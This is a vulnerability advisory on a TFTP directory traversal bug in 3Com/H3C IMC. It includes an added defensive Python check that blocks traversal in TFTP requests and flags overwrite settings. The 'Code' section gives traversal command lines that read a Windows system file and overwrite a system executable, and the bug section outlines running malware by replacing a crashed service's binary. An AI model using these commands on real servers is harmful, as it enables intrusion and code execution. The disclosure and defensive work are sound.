#######################################################################

                             Luigi Auriemma

Application:  3com / H3C Intelligent Management Center (IMC)
              http://www.3com.com/IMC_Enterprise/
Versions:     <= 3.3 SP2 R2606P13
Platforms:    Windows, Linux, Solaris
Bug:          directory traversal in tftpserver.exe
Exploitation: remote, versus server
Date:         probably found 18 Oct 2010
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

"3Com® Intelligent Management Center (IMC) Enterprise Edition is a
self-contained comprehensive management solution, flexible and scalable
enough to meet the needs of advanced Enterprise networks."

The suite is also known under the vendors HP and H3C (the original
developer).

#######################################################################

======
2) Bug
======

tftpserver.exe is a TFTP service running on UDP port 69 and available in
the default configuration of IMC; it uses the "server\tmp" folder located
in the IMC directory as base path.

This service is affected by a directory traversal vulnerability,
exploitable through the classical ..\ and ../ sequences, that allows a
remote attacker to download and upload files located on the disk where
IMC is installed.

The most interesting effect of this vulnerability is the upload one,
because the server is configured to overwrite automatically any file
(allow_overwrite=yes and overwrite_readonly=yes in tftpserver.cfg) and,
since the service runs with SYSTEM privileges, file permissions do not
get in the way.

For example an attacker could execute his malicious code by crashing one
of the IMC services vulnerable to Denial of Service bugs and replacing
its executable with the one of the malware, so that IMC will start it
automatically within some seconds.
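The following is an added example and not part of the original advisory
nor of the IMC product: it shows, from the defender's side, what the
missing check in a TFTP service looks like. It parses a TFTP read/write
request (RFC 1350: 2-byte opcode, filename, NUL, mode, NUL), maps the
client-supplied filename onto the serving directory treating both "\"
and "/" as separators (the advisory reports traversal through both ..\
and ../), and refuses anything that would escape it. A second helper
flags the two tftpserver.cfg settings the advisory names when they are
set to "yes". The base directory, the sample packets and the sample
configuration text are constructed for the example; the real service's
path layout and full configuration syntax are not shown on the page.

```python
import posixpath

# Constructed stand-in for the IMC "server\tmp" base directory named in the
# advisory; the real service's path layout is not shown on the page.
BASE_DIR = "/opt/imc/server/tmp"

# Constructed sample of the two tftpserver.cfg settings the advisory names.
SAMPLE_CFG = """# constructed sample, not the real tftpserver.cfg
allow_overwrite=yes
overwrite_readonly=yes
"""


def parse_tftp_request(packet):
    """Parse a TFTP RRQ/WRQ (RFC 1350): 2-byte opcode, filename, NUL, mode, NUL.

    Returns (opcode, filename, mode) or None if the packet is not a request.
    """
    if len(packet) < 4:
        return None
    opcode = int.from_bytes(packet[:2], "big")
    if opcode not in (1, 2):          # 1 = read request, 2 = write request
        return None
    fields = packet[2:].split(b"\x00")
    if len(fields) < 3:               # filename, mode and the trailing empty field
        return None
    filename = fields[0].decode("latin-1")
    mode = fields[1].decode("latin-1").lower()
    return opcode, filename, mode


def resolve_tftp_path(base_dir, requested):
    """Map a client-supplied filename onto base_dir, or return None if it escapes.

    Both '\\' and '/' count as separators because the Windows service honours
    both and the advisory reports traversal through ..\\ and ../ sequences.
    The check is lexical, so it gives the same verdict on every host.
    """
    if "\x00" in requested or not requested:
        return None
    unified = requested.replace("\\", "/")
    # A TFTP filename is always relative to the serving directory: drop a drive
    # letter or leading slash rather than letting it form an absolute path.
    if len(unified) >= 2 and unified[1] == ":":
        unified = unified[2:]
    unified = unified.lstrip("/")
    normalised = posixpath.normpath(unified)
    if normalised == "." or normalised == ".." or normalised.startswith("../"):
        return None
    candidate = posixpath.join(base_dir, normalised)
    # Belt and braces: the joined path must still sit under base_dir.
    root = base_dir.rstrip("/") + "/"
    if not candidate.startswith(root):
        return None
    return candidate


def check_request(packet, base_dir=BASE_DIR):
    """Classify a raw request packet: 'invalid', 'traversal' or the resolved path."""
    parsed = parse_tftp_request(packet)
    if parsed is None:
        return "invalid"
    _opcode, filename, _mode = parsed
    path = resolve_tftp_path(base_dir, filename)
    return "traversal" if path is None else path


def audit_cfg(cfg_text):
    """Return the key=value lines that enable silent overwrite, as a sorted list."""
    risky = {"allow_overwrite", "overwrite_readonly"}
    findings = []
    for line in cfg_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        if key in risky and value.lower() == "yes":
            findings.append(f"{key}={value}")
    return sorted(findings)


if __name__ == "__main__":
    # Constructed packets: a benign read and the traversal pattern from the advisory.
    benign = b"\x00\x01device/startup.cfg\x00octet\x00"
    bad = b"\x00\x02" + b"..\\..\\..\\..\\..\\..\\..\\windows\\win.ini" + b"\x00octet\x00"
    print(check_request(benign))   # /opt/imc/server/tmp/device/startup.cfg
    print(check_request(bad))      # traversal
    print(audit_cfg(SAMPLE_CFG))   # ['allow_overwrite=yes', 'overwrite_readonly=yes']
```

The same request classifier can be run over captured UDP/69 payloads to
spot traversal attempts against a service that cannot be patched yet,
and audit_cfg gives a quick answer to whether the overwrite settings the
advisory relies on are still enabled.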
#######################################################################

===========
3) The Code
===========

http://aluigi.org/testz/tftpx.zip

  tftpx SERVER ..\..\..\..\..\..\..\windows\win.ini output.txt

  tftpx -u SERVER ..\..\..\..\..\..\..\windows\system32\calc.exe malware_input.exe

#######################################################################

======
4) Fix
======

http://www.zerodayinitiative.com/advisories/ZDI-11-161

#######################################################################